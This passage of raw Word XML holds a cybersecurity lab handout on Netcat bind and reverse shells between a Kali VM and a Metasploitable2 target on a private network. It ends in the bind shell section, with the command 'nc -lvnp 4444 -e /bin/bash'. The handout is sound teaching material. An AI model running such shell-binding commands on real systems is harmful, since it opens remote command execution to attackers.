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A636" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00565784">
      <w:pPr>
        <w:spacing w:before="2200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="444453C3" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WEEKLY CYBERSECURITY TOOLS TRACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4E3A22" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="260" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t>Netcat (nc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3018D91C" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="700"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Practical 3 — Bind Shell &amp; Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444DC7D6" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3000"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Hands-on lab practicals using Netcat between a Kali Linux VM and a Metasploitable2 target VM on a private VirtualBox host-only network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F82D36" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="4D4D4D"/>
        </w:rPr>
        <w:t>Prepared by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EB73F8" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Emmanuel Aidoo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CCB49B" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Lab environment: Kali Linux (attacker) · Metasploitable2 (target) · Oracle VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70396B08" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CC121B" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00565784">
      <w:pPr>
        <w:sectPr w:rsidR="00565784">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="900" w:right="1000" w:bottom="900" w:left="1000" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60DF8DEB" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="6" w:color="333333"/>
        </w:pBdr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5450BA" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10040"/>
        </w:tabs>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Practical Overview</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA9E009" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10040"/>
        </w:tabs>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1.  Bind Shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C04ABD6" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10040"/>
        </w:tabs>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2.  Reverse Shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A41003D" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10040"/>
        </w:tabs>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Takeaways</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB319A5" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EBC7F4" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="6" w:color="333333"/>
        </w:pBdr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Practical Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27629C88" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Earlier practicals used a raw Netcat connection to move a file, hold a chat, scan ports, and grab a service banner. The -e flag takes this a step further: instead of Netcat printing what it reads and writes to the screen, it hands the connection to a program, so that program's input and output travel over the network instead of the local terminal. Passing -e /bin/bash attaches a Bash shell to the connection, letting one machine run commands on the other and see the output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1BCC6D" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>This practical set up the two classic ways of doing this: a bind shell, where the target listens and waits for the attacker to connect into a shell, and a reverse shell, where the target connects out to a listener the attacker has already set up. Both were run between the Kali VM (192.168.56.101) and the Metasploitable2 VM (192.168.56.102).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000"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2998"/>
        <w:gridCol w:w="7036"/>
      </w:tblGrid>
      <w:tr w:rsidR="00565784" w14:paraId="46FF8B7B" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7E7E1BDB" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ENVIRONMENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565784" w14:paraId="591A27B6" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5496CF50" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Setting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="389C23E7" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565784" w14:paraId="74184254"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5B72664E" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Attacker VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4ECB9B79" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="262626"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Kali Linux — 192.168.56.101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565784" w14:paraId="568D8A8B"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61B57465" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Target VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="093F257B" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="262626"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Metasploitable2 — 192.168.56.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565784" w14:paraId="5D6C1C15"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0F08CC71" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F97CBA3" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="262626"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>VirtualBox host-only adapter (192.168.56.0/24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565784" w14:paraId="7D32657C"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177E32BD" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F6D3FB8" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="262626"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Netcat (nc), traditional version, as installed on Kali and Metasploitable2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="116C389E" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00565784">
      <w:pPr>
        <w:spacing w:before="220"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000"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2999"/>
        <w:gridCol w:w="7035"/>
      </w:tblGrid>
      <w:tr w:rsidR="00565784" w14:paraId="37688CE5" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7FC4AE88" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>KEY FLAG USED IN THIS PRACTICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565784" w14:paraId="0F9D44A8" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40F1FFD6" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1EF09BFF" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565784" w14:paraId="63AD4064"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1F5F8B4B" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>-e &lt;program&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F6F80CF" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="262626"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Execute: attach the given program to the connection so its input and output flow over the network instead of the local terminal (used here with /bin/bash)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565784" w14:paraId="4321C3DD"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088C2934" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>-l</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04156073" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="262626"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Listen: wait for an incoming connection instead of connecting out</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565784" w14:paraId="7904710C"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0163D5F2" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>-p &lt;port&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E136487" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="262626"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Bind the listener to this local port</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A71D537" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0D8290" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="6" w:color="333333"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Bind Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D569125" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>In a bind shell, the target machine listens on a port and attaches a shell to whatever connection arrives. The attacker then simply connects to that port to get command execution on the target. This practical ran the listener on Metasploitable2 and connected to it from Kali.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565784" w14:paraId="22AB6223" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2D0B398B" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>COMMANDS USED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565784" w14:paraId="44BC70BF" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A1A1A"/>
            <w:tcMar>
              <w:top w:w="160" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="160" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="23E0ADFC" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="BDBDBD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t># On Metasploitable2 (target) — 192.168.56.102</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D7F6B25" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F0F0F0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>$ nc -lvnp 4444 -e /bin/bash</w:t>
            </w:r>
          </w:p>
